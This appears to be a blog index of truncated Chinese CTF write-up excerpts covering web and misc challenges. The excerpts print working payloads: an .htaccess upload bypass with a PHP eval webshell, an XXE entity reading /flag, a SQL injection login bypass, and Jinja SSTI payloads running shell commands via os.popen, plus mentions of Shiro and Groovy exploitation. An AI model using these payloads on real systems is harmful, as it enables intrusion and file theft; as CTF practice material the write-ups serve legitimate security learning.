Yxing

WEBonly real在登录界面源码中找到账号密码登录 进去后发现上传按钮是灰的，尝试将源码中disabled删除后上传什么回显也没有，换个思路去访问了upload.php和uploads/，发现前者是“上传成功”，后者是“forbidden”，说明有这个文件和目录，所以直接换成upload.php上传，但是直接上传1.php失败，检测非法类型，.htaccess绕过即可 <FilesMatch "1.png" >SetHandler application/x-httpd-php</FilesMatch> #1.png<?php eval($_POST[123]);?> 然后访问/uploads/1.png蚁剑连接成功，在上级目录找到flag xmctf{xm_xxe_blind_success} ez_pythonfrom flask import Flask, requestimport jsonapp = Flask(__name__)def merge(src, dst): ...

SecureDoc发现是一个pdf上传器，能够识别提取XFA表单，搜索发现XFA使用XML结构，所以加上pdf文件头后直接伪造就行 %PDF-1.7%<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xdp [ <!ENTITY flag SYSTEM "file:///flag">]><xdp:xdp> <xfa:datasets> <xfa:data> <data>&flag;</data> </xfa:data> ...

sql_in万能密码绕过即可 POST:password=1&username=admin' or 1# PCTF{fa88f815-81f4-481d-b931-87d74f37d0ce} 复读机测试后发现存在ssti漏洞 直接打就行 POST:cmd={{lipsum.__globals__['os'].popen('env').read()}} PCTF{8ce08c23-f652-49d8-bfdf-4c179e0e05ba} what_is_jsfuck源码中给出提示<!-- Hint:Try entering "I want flag"...

...

...

WEBezpython源码找到路由/s3c0nd，进去发现需要fuzz，(直接盲猜114514结果对了)，再进去是个ssti，直接打就行 GET:name={{lipsum.__globals__['os'].popen('cat /flag').read()}} ctfplus{6b0f159b-165b-4d18-86ae-5a49709ea088} MISC签到先base64解码，然后去查这个域名的txt记录 dig TXT...

0 Web入门指北直接放控制台回车就行 moectf{jv@vScr1p7_14_so0o0o0o_inT3r3&t!!!} 01 第一章 神秘的手镯只有前端验证，网络响应或者是直接控制台输入都行 document.getElementById('passwordInput').value =...

WEBezDecryption源码中找到提示2025，就是第一步验证码答案 抓包修改step2为step3进入第三关 分析源码中js文件，在控制台中分析获得第一段为panshi 第二段base64解码后为2oZ5 发包获得flag flag{d1g1t4l_l0ck_br34k3r_2025} 1web-jaba_ezMISC1derderjiaeasy_miscBinwalk提取图片获得压缩包，里面是ook编码，解密获得y0u_c@t_m3!!!，就是压缩包密码，解压获得flagflag{3088eb0b-6e6b-11ed-9a10-145afc243ea2} 1两个数level1尝试直接二进制转ascii不行，那就尝试按位反转后补齐转ascii # 给定的二进制串列表binary_strings = [ "1100001", "000011", "0111011", "1110011", "0100111",...

JavaSeri签到题，借这个题顺便解决了哈shiro框架工具不能正常使用的历史遗留问题，最后发现java版本1.8.0_321能够正常使用 这个题登录之后看到熟悉的rememberMe，直接工具一把梭，爆破密钥加爆破利用链及回显再执行命令就行了 flag{e22d3fa1-4a94-1155-e387-9b8744455d70} easyGooGooVVVY参考ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 - twsec -...

...